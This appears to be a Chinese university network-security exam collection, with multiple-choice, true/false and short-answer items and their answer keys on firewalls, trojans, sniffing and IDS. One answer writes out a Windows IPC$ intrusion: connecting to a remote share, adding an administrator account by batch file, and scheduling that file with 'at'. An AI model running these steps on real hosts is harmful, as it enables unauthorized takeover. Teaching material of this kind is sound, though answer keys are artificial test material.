大学试题(计算机科学)-网络安全技术笔试(2018-2023年)真题摘选含答案_第1页
大学试题(计算机科学)-网络安全技术笔试(2018-2023年)真题摘选含答案_第2页
大学试题(计算机科学)-网络安全技术笔试(2018-2023年)真题摘选含答案_第3页
大学试题(计算机科学)-网络安全技术笔试(2018-2023年)真题摘选含答案_第4页
大学试题(计算机科学)-网络安全技术笔试(2018-2023年)真题摘选含答案_第5页
已阅读5页,还剩7页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

长风破浪会有时,直挂云帆济沧海。大学试题(计算机科学)-网络安全技术笔试(2018-2023年)真题摘选含答案(图片大小可自由调整)卷I一.参考题库(共30题)1.信息安全目标CIA中A指的是可用性。2.黑客分为多种,()的原则是“谁给钱多给谁干”。A、破坏者B、红客C、间谍D、骇客3.窃听是一种()攻击,攻击者()将自己的系统插入到发送站和接收站之间。截获是一种()攻击,攻击者()将自己的系统插入到发送站和接受站之间。A、被动;无须;主动;必须B、主动;必须;被动;无须C、主动;无须;被动;必须D、被动;必须;主动;无须4.在以下人为的恶意攻击中,属于主动攻击的是()。A、身份假冒B、数据窃听C、数据流分析D、非法访问5.计算机病毒按按入侵的途径分为()4种。6.屏蔽路由器型防火墙采用的技术是基于()。A、数据包过滤技术B、应用网关技术C、代理服务技术D、三种技术的结合7.PGP加密技术是一个基于DES对称密钥体系的邮件加密软件。8.用IPC$入侵方法在远程主机192.168.11.1上建立一个帐号为STU2,并加入administrators过程。9.使用防病毒软件时,一般要求用户每隔2周进行升级,这样做的目的是()。A、对付最新的病毒,因此需要下载最新的程序B、程序中有错误,所以要不断升级,消除程序中的BUGC、新的病毒在不断出现,因此需要用及时更新病毒的特征码资料库D、以上说法的都不对10.在远程机器192.168.1.23上把帐号stu加入administrators组的net完整命令是()。11.会话层的主要功能是允许不同机器上用户之间建立会话关系。12.防火墙不能防止来自网络内部的攻击。13.计算机病毒按破坏的程度分:可分为()和()。14.下面()不是网络端口扫描工具。A、SuperscanB、HostScanC、X-ScannerD、SnifferPRO15.说一说重点对付DDoS攻击的一些常规的网络攻击防范的方法?16.什么是网络嗅探?17.一般木马程序包括()和()两个程序。18.扫描的主要技术有:()。19.请解释5种“非法访问”攻击方式的含义。20.口令破解的方法有很多,最为常见的有()和暴力破解。21.计算机网络安全的目的什么?22.保证操作系统的安全是网管的第一要务,通过()可以针对Windows操作系统进行有效的安全加固,从而为其他应用构筑最基础的安全平台。A、使用强壮的密码,不使用诸如生日、电话号码等易被猜测的口令B、定时安装系统补丁,及时修补操作系统的漏洞C、只启必需的服务,关闭不必要的服务和端口D、安装防火墙和入侵检测系统23.网络监听的手段是截获通信的内容,监听的目的是对协议进行分析。24.直接利用ping工具发送超大的ping数据包,这种攻击称为PingofDeath。25.用户收到了一封可疑的电子邮件,要求用户提供银行账户及密码,这是属于何种攻击手段?()A、缓存溢出攻击B、钓鱼攻击C、暗门攻击D、DDOS攻击26.目前,VPN使用了()技术保证了通信的安全性。A、隧道协议、身份认证和数据加密B、身份认证、数据加密C、隧道协议、身份认证D、隧道协议、数据加密27.在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示. 此帧的用途和目的是什么?28.入侵检测系统从分析方式上主要可分为两种:()。29.一般认为蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一切共性,如传播性、隐蔽性、破坏性等。30.代理服务作为防火墙技术主要在OSI的哪一层实现()。A、数据链路层B、网络层C、表示层D、应用层卷I参考答案一.参考题库1.参考答案:正确2.参考答案:C3.参考答案:A4.参考答案:A5.参考答案:源码型病毒、入侵型病毒、操作系统型病毒、外壳型病毒6.参考答案:B7.参考答案:错误8.参考答案: ①、netuse//192.168.11.1/ipc$“password”/user:”admin” ②、建立文件hacker.bat,其内容: netusers1123/add netlocalgroupadministratorsstu/add ③、copyhacker.bat//192.169.11.1/c$ ④、nettime//192.168.11.1(取得时间t) ⑤、at//192.168.11.1t+3c:/hacker.bat9.参考答案:C10.参考答案:Netlocalgroupadministratorsstu/add11.参考答案:正确12.参考答案:正确13.参考答案:良性病毒;恶性病毒14.参考答案:D15.参考答案:定期扫描,在骨干节点配置防火墙,用足够的机器承受黑客攻击,充分利用网络设备保护网络资源,过滤不必要的服务和端口,检查访问者的来源,限制SYN/ICMP流量等。16.参考答案: 嗅探(Sniffer)技术是网络安全检测技术中很重要的一种,它是一种可以捕获网络报文的软件工具或者设备,网络安全管理人员会经常借助此类工具对网络的各种活动进行实时监测,发现网络中的攻击行为。与主动扫描相比,嗅探的行为更难察觉,因此,黑客也会利用具有很强非常隐蔽性的嗅探技术攫取网络中的敏感信息。17.参考答案:服务器端;客户端18.参考答案:存活性扫描、端口扫描、服务识别、操作系统识别19.参考答案: 1)口令破解 攻击者可以通过获取口令文件然后运用口令破解工具进行字典攻击或暴力攻击来获得口令,也可通过猜测或窃听等方式获取口令,从而进入系统进行非法访问,选择安全的口令非常重要。这也是黑客入侵中真正攻击方式的一种。 2)IP欺骗 攻击者可通过伪装成被信任源IP地址等方式来骗取目标主机的信任,这主要针对LinuxUNIX下建立起IP地址信任关系的主机实施欺骗。这也是黑客入侵中真正攻击方式的一种。 3)DNS欺骗 当DNS服务器向另一个DNS服务器发送某个解析请求(由域名解析出IP地址)时,因为不进行身份验证,这样黑客就可以冒充被请求方,向请求方返回一个被篡改了的应答(IP地址),将用户引向黑客设定的主机。这也是黑客入侵中真正攻击方式的一种。 4)重放(Replay)攻击 在消息没有时间戳的情况下,攻击者利用身份认证机制中的漏洞先把别人有用的消息记录下来,过一段时间后再发送出去。 5)特洛伊木马(TrojanHorse) 把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中,而一旦用户触发正常程序,黑客代码同时被激活,这些代码往往能完成黑客早已指定的任务(如监听某个不常用端口,假冒登录界面获取帐号和口令等)。20.参考答案:猜解简单口令、字典破解21.参考答案:计算机网络安全的目的简单地说就是要充分利用现有的各种网络安全技术手段使计算机网络的使用者获得良好的网络安全使用环境。22.参考答案:A,B,C23.参考答案:错误24.参考答案:正确25.参考答案:B26.参考答案:A27.参考答案: 地址解析协议的ARP查询。28.参考答案:模式发现技术(模式匹配)、异常发现技术(异常检测)29.参考答案:正确30.参考答案:D卷II一.参考题库(共30题)1.说一说木马的防治方法?2.加密技术不能实现()。A、数据信息的完整性B、基于密码技术的身份认证C、机密文件加密D、基于IP的头信息的包过滤3.交换机是企业局域网络正常运行的关键设备,作为一名网管需要采取()的安全管理措施才能保证企业网用户正常的网络通信。A、通过VLAN把局域网分段管理B、设置难度较高的管理口令C、连接到路由器上D、将多台交换机叠加起来使用4.在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示. 它的目的IP地址是(),它属于()地址。5.命令netusez://192.168.11.6/c$成功执行的结果是什么?6.下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。 Web服务器的IP地址是(),它属于()地址。7.电路级网关是以下哪一种软/硬件的类型?()A、防火墙B、入侵检测软件C、端口D、商业支付程序8.什么是流氓软件?9.加密在网络上的作用就是防止有价值的信息在网上被()。A、拦截和破坏B、拦截和窃取C、篡改和损坏D、篡改和窃取10.简述木马攻击的过程.11.在以下认证方式中,最常用的认证方式是:()A、基于账户名/口令认证B、基于摘要算法认证C、基于PKI认证D、基于数据库认证12.密钥生成形式有两种:一种是由()生成,另一种是由个人分散生成。13.注册表中DWORD数据类型的长度为()个字节。14.下面()不是网络攻击的防范方法。A、定期扫描B、配置防火墙C、机器冗余D、流量均衡15.删除账号stu的命令是()(密码是123)。A、netuser123stuB、netuser123stu/delC、netuse123stu/delD、netuserstu123/del16.木马是一种可以驻留在对方客户端系统中的一种程序。17.Hash函数是可接受()数据输入,并生成定长数据输出的函数。18.在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示. 它的源IP地址是(),它属于()IP地址。19.入侵防护系统(IPS)倾向于提供主动防护,其设计宗旨是预先对入侵活动和攻击性网络流量进行拦截,避免其造成损失,而不是简单地在恶意流量传送时或传送后才发出警报。20.一个完备的入侵检测系统IDS一定是基于主机和基于网络两种方式兼备的分布式系统。21.什么是IDS,它有哪些基本功能?22.包过滤防火墙中的包过滤器一般安装在(),工作在网络的第三层。23.在OSI七个层次的基础上,将安全体系划分为四个级别,以下哪一个不属于四个级别()。A、网络级安全B、系统级安全C、应用级安全D、链路级安全24.下面关于口令的安全描述中错误的是()`。A、口令要定期更换B、口令越长越安全C、容易记忆的口令不安全D、口令中使25.“流氓软件”通俗的讲是指那些在人们使用电脑上网时,产生不受人控制,不断跳出的与用户打开的网页不相干的奇怪画面,或者是做各种广告的软件。26.计算机病毒是计算机系统中自动产生的。27.在OSI参考模型中,()是完成网络中主机间的报文传输。A、应用层B、网络层C、传输层D、数据链路层28.解释反弹技术29.网络监听是网络管理员的工作,监听的内容是网络信息的流动,监听的工具是(),监听最好的地方是()、网关与防火墙。30.说一说网络嗅探的检测方法?卷II参考答案一.参考题库1.参考答案: ①安装反病毒软件。时刻打开杀毒软件,大多数反病毒工具软件几乎都可检测到所有的特洛伊木马,但值得注意的是,应及时更新反病毒软件。 ②安装特洛伊木马删除软件。反病毒软件虽然能查出木马,但却不能将它从计算机上删除。为此必须安装诸如TROJIAREMOVER之类的软件。 ③建立个人防火墙。当木马进入计算机时,防火墙可以对你进行有效保护。 ④不要执行来历不明的软件和程序。木马的服务端程序只有在被执行后才会生效。通过网络下载的文件,QQ或MSN传输的文件,以及从别人那拷贝来的文件,对电子邮件附件在没有十足把握的情况下,千万不要将它打开。最好是在运行它之前,先用反病毒软件对它进行检查。2.参考答案:D3.参考答案:A,B4.参考答案:10.0.26.1;单播5.参考答案:该命令的成功执行结果是在本地机器上多出一个盘符Z,Z盘实质上就是远程机器的C盘,在本地对Z盘的操作就等于对远程机器C盘的操作。6.参考答案:202.203.208.32;公网7.参考答案:A8.参考答案:“流氓软件”通俗的讲是指那些在人们使用电脑上网时,产生不受人控制,不断跳出的与用户打开的网页不相干的奇怪画面,或者是做各种广告的软件。“流氓软件”是指介于病毒和正规软件之间的一类软件。9.参考答案:B10.参考答案: ①配置生成服务端 ②种植木马 ③上线,一般由主动和自动上线两种 ④控制操作,实现攻击者的意图11.参考答案:A12.参考答案:中心集中13.参考答案:414.参考答案:D15.参考答案:B16.参考答案:错误17.参考答案:变长18.参考答案:10.0.26.12;私网19.参考答案:正确20.参考答案:正确21.参考答案: 入侵检测系统IDS,它从计算机网络系统中的若干关键点收集信息,并分析这些信息,检查网络中是否有违反安全策略的行为和遭到袭击的迹象。入侵检测被认为是防火墙之后的第二道安全闸门。 1)监测并分析用户和系统的活动,查找非法用户和合法用户的越权操作; 2)核查系统配置和漏洞并提示管理员修补漏洞; 3)评估系统关键资源和数据文件的完整性; 4)识别已知的攻击行为,统计

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论